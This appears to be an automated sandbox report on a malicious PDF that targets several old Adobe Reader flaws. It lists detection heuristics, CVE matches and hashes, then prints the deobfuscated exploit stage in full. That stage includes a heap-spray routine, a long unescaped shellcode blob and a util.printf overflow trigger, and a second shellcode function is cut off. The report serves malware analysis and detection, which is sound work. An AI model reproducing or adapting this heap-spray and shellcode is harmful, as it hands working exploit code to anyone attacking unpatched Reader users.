Verdict: MALICIOUS (risk score 676)
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
This PDF file contains obfuscated JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is designed to download and execute a second-stage payload, as indicated by the ClamAV detection of 'Js.Exploit.Shellcode-18' on an extracted artifact. The primary function of the embedded script is to facilitate the execution of further malicious code.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (12)
- media.newPlayer — CVE-2009-4324 (critical; CVE match: exact; rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical; CVE match: exact; rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE match: exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 (critical; CVE match: exact; rule CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher (critical; CVE match: likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- ClamAV: Pdf.Exploit.Agent-36086 (critical; rule CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
- Multi-CVE Adobe Reader JavaScript exploit kit (critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action (low; 3 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Large comment-padded JavaScript eval stager (high; rule PDF_JS_LARGE_COMMENT_PADDED_EVAL): PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Artifact 1: javascript_obj0006_000.js

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0006_000.js | pdf-javascript-stream | PDF /JS object 6 at offset 0x143 | 425197 bytes |

Hash: 97b25d00f38717efd02e3f4bc4b0364462feb80d03841e8de2391d599f772b9f
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s) and 42 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
function Ba(Xa){ /*
... (truncated)
Artifact 2: legacy_pdfkit_stage_000.js

| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_000.js | deobfuscated-js | comment-padded substitution-hex decoded JavaScript at offset 0x143 | 10413 bytes |

Hash: c8ff04c53cd8c6c03c70245f36dbe82204bc0209339bb6e374a91cccceab3cc5
Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: likely. Carved artifact contains 12 eval/decoder/string-building token(s) and 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
function fix_it(yarsp,len)
{
while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uDBFF%u261B%uBF0B%u16BA%uDB0B%uAD1B%uD74B%u5690%u7617%u5690%u5A03%u26DF%u24FC%uADE4%u60E7%u2653%uDB0B%u2671%u5563%u2855%uB3E7%uD883%uD581%uC973%u3BC5%u4E7B%u1138%u7D91%uE363%u8A39%uB3EC%u6FF1%u3381%uFD73%uF881%u4EF2%u9750%uFB01%u3763%u258C%u3307%u2704%uDB0B%u2292%u5820%u22F0%u1B00%uD76E%uB563%u527E%uB30B%u4F6C%uB265%uD94F%uF35E%u7F42%u1B00%uA214%uDBF3%u261B%u2B80%u7EA0%uDB0B%u4C1B%uB30B%u6232%u8CE3%u6F73%uD4E6%u4E65%u9080%u79F8%u3BE3%u261B%u520B%u0D1F%u3088%u2D1F%uAECB%uABEA%uDB8E%u2619%u8B0B%uD973%uDB0B%uD91B%uEF5E%uA396%uDF0B%u261B%uB15B%u4C1B%u560B%u269E%uDB09%u761B%u8EF4%uAB23%uDBBE%u261F%u770B%uE611%u207E%uE155%uF50D%u5E7E%u1C6E%u225D%uDB0B%u261B%u5E86%u221B%uDB0B%uEF28%u8B5A%u73E4%u9B37%uA214%uDB8B%u261B%u5243%u6A5E%uDB63%u265B%uB10B%uD95B%u935E%uE610%uB57F%u6392%uB16B%u4C1B%uB10B%u4C1B%uB10B%uD91B%u8B5E%uE610%u817F%u2671%uDB63%u261B%uB10F%u4C1B%u320B%u26B1%uDB0B%uD94B%u8F5E%uE610%u997F%u6392%u5663%u425E%uB35B%u661B%uDB0B%u53E4%u246B%u4E6E%u8EF4%u2D43%uAFCB%uAD0E%uBF4E%uE610%uD57F%u53E4%u246F%u466E%uAEF4%uD957%u9B5E%uF3F0%uAEF4%uD957%u9F5E%uEF30%u8A4A%uA396%uDF0B%u261B%u245B%u0A4E%u2461%u73E4%u8E3B%uCA90%uA680%u2D13%uAFF4%u7550%u0580%uAD4D%uE778%u5290%uA338%uD518%u505D%u066D%u2808%uEF28%u9A42%u25B6%u8DC8%uD028%u6504%u1E0B%uAFDD%uE713%uD6C5%uD418%u304B%u1DEA%u85F5%uC36E%u5051%uADF0%uFF51%uFB18%u506D%u6D17%u8180%u2507%u50D6%uAD1F%u1E08%u7D45%uD9E0%uE628%u1956%u261F%u8AE3%uD9E4%uB3F4%u526F%uE17B%u0934%uA86A%u4772%uAB65%u5474%uAF65%u4F69%uF57B%u4978%uF466%u546F%uBF6A%u097E%uB834%u1726%uA82D%u4272%uBE36%u4429%uEE3F%u117F%uE83C%u442B%uB93F%u1723%uED6E%u1779%uEF33%u457D%uEE3F%u422A%uBD6E%u162A%uFD3C%u1B68%uDB38%u261B%u000B");
var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock=nop+payload;
var bigblock=unescape("%u0A0A%u0A0A");
var headersize=20;
var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);
var block=bigblock.substring(0,bigblock.length-spray);
while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();
for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);
}
function collab_email()
{
var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uDBFF%u261B%uBF0B%u16BA%uDB0B%uAD1B%uD74B%u5690%u7617%u5690%u5A03%u26DF%u24FC%uADE4%u60E7%u2653%uDB0B%u2671%u5563%u2855%uB3E7%uD883%uD581%uC973%u3BC5%u4E7B%u1138%u7D91%uE363%u8A39%uB3EC%u6FF1%u3381%uFD73%uF881%u4EF2%u9750%uFB01%u3763%u258C%u3307%u2704%uDB0B%u2292%u5820%u22F0%u1B00%uD76E%uB563%u527E%uB30B%u4F6C%uB265%uD94F%uF35E%u7F42%u1B00%uA214%uDBF3%u261B%u2B80%u7EA0%uDB0B%u4C1B%uB30B%u6232%u8CE3%u6F73%uD4E6%u4E65%u9080%u79F8%u3BE3%u261B%u520B%u0D1F%u3088%u2D1F%uAECB%uABEA%uDB8E%u2619%u8B0B%uD973%uDB0B%uD91B%uEF5E%uA396%uDF0B%u261B%uB15B%u4C1B%u560B%u269E%uDB09%u761B%u8EF4%uAB23%uDBBE%u261F%u770B%uE611%u207E%uE155%uF50D%u5E7E%u1C6E%u225D%uDB0B%u261B%u5E86%u221B%uDB0B%uEF28%u8B5A%u73E4%u9B37%uA214%uDB8B%u261B%u5243%u6A5E%uDB63%u265B%uB10B%uD95B%u935E%uE610%uB57F%u6392%uB16B%u4C1B%uB10B%u4C1B%uB10B%uD91B%u8B5E%uE610%u817F%u2671%uDB63%u261B%uB10F%u4C1B%u320B%u26B1%uDB0B%uD94B%u8F5E%uE610%u997F%u6392%u5663%u425E%uB35B%u661B%uDB0B%u53E4%u246B%u4E6E%u8EF4%u2D43%uAFCB%uAD0E%uBF4E%uE610%uD57F%u53E4%u246F%u466E%uAEF4%uD957%u9B5E%uF3F0%uAEF4%uD957%u9F5E%uEF30%u8A4A%uA396%uDF0B%u261B%u245B%u0A4E%u2461%u73E4%u8E3B%uCA90%uA680%u2D13%uAFF4
... (truncated)